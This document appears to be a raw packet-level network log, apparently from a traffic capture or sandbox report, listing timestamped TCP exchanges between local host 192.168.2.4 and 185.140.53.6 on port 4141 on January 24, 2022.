Jan 24, 2022 02:26:12.543941021 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.543992996 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.544038057 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.544114113 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.544306040 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.544329882 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.544375896 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.544500113 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.544548035 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.549633980 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553464890 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553491116 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553572893 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.553591013 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553674936 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.553723097 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553782940 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.553858995 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.557411909 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.557826996 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.557910919 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.559108973 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.559601068 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.559654951 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.560000896 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.561605930 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.561690092 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.561748028 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.562031984 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.562084913 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.563370943 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.563632965 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.565403938 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.574898005 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.576582909 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.576642036 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.576678038 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.576724052 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.576798916 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.576848984 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.580614090 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.581618071 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.590339899 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.590646982 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.590718031 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.608078957 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.610691071 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.610855103 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.610934019 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.610968113 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611021042 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611054897 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611108065 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611135006 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611181974 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611212969 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611232042 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611259937 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611288071 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611414909 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611541986 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611591101 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611643076 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611694098 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611701012 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611748934 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.611814976 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.611860991 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612014055 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612060070 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612126112 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612183094 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612225056 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612270117 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612323046 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612374067 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612404108 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612452984 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612662077 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612710953 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.612819910 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.612868071 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.629813910 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.629882097 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.631201982 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.631273985 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.631619930 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.631681919 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.631731987 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.631793022 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.632630110 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.632747889 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.633148909 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.633203983 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.651252031 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.651283026 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.651326895 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.651359081 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.653208971 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.653270006 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.653508902 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.653562069 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.654805899 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.654866934 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.655033112 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.655096054 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.657274961 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.657344103 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.658696890 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.659250975 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.659322023 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.660213947 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.660268068 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.660669088 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.660718918 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.662369013 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.662667990 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.662717104 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.662739992 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.662770987 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.664167881 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.664238930 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.664483070 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.664540052 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.664968014 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.665029049 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.665239096 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.665287971 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712124109 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712162971 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712186098 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712197065 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712208033 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712224960 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712248087 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712292910 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712515116 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712539911 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712560892 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712594986 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712619066 CET	4141	49831	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:12.712642908 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:12.712655067 CET	49831	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:16.639744997 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:16.719499111 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:16.719624996 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:16.719866991 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:16.963669062 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:16.963941097 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.062733889 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.063419104 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.246469021 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.246534109 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.246601105 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.404320955 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.404383898 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.404422998 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.404496908 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.405215979 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.405297995 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.542047977 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542121887 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542164087 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542182922 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.542202950 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542308092 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542346954 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542361975 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.542385101 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.542510033 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.542622089 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.543113947 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.651248932 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651309967 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651349068 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651385069 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.651459932 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651514053 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651560068 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.651667118 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651715994 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.651791096 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651885033 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.651932001 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.652000904 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652200937 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652256966 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652478933 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652517080 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.652540922 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.652781010 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652823925 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652863026 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652899981 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.652899981 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.652944088 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.755409956 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.755470037 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.755934000 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.763948917 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.763999939 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.764069080 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.764157057 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.765299082 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.765449047 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.765656948 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.765696049 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.765733957 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.765758991 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.765829086 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766040087 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.766042948 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766086102 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766138077 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.766155005 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766335011 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766374111 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766408920 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.766422033 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.766448021 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.770318031 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.770384073 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.770489931 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.771868944 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.773931980 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.773993015 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.773998022 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.774054050 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.774111032 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.774166107 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.774296999 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.774513960 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.774573088 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.774631023 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.774678946 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.774744987 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775374889 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775418043 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775435925 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.775455952 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775495052 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775533915 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.775547028 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.775582075 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.870573997 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.870649099 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.870702982 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.870759010 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.870771885 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.870887995 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.870949030 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871006966 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871102095 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.871107101 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871269941 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871439934 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871496916 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871534109 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.871632099 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.871673107 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871727943 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.871809959 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.871896029 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872018099 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872133017 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.872208118 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872354984 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872397900 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872469902 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.872514963 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872555017 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872586012 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.872756958 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872925043 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872965097 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.872992992 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.873064995 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873080969 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.873181105 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873311996 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873389959 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.873533010 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873604059 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.873703003 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873742104 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.873955011 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874001980 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874032974 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.874092102 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874114990 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.874268055 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874325991 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874382019 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.874479055 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.874535084 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.889302969 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.915888071 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.915946007 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.915976048 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.915999889 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916038036 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916075945 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916095972 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.916116953 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916131973 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.916331053 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916373968 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916413069 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916426897 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.916460991 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.916486979 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916693926 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916733027 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.916795969 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.916960001 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.917062998 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.917090893 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.917129040 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.917239904 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.917294979 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.972676992 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.972738028 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.973057032 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.974874020 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.986979008 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987037897 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987061024 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.987077951 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987176895 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987251043 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.987315893 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987373114 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.987417936 CET	4141	49833	185.140.53.6	192.168.2.4
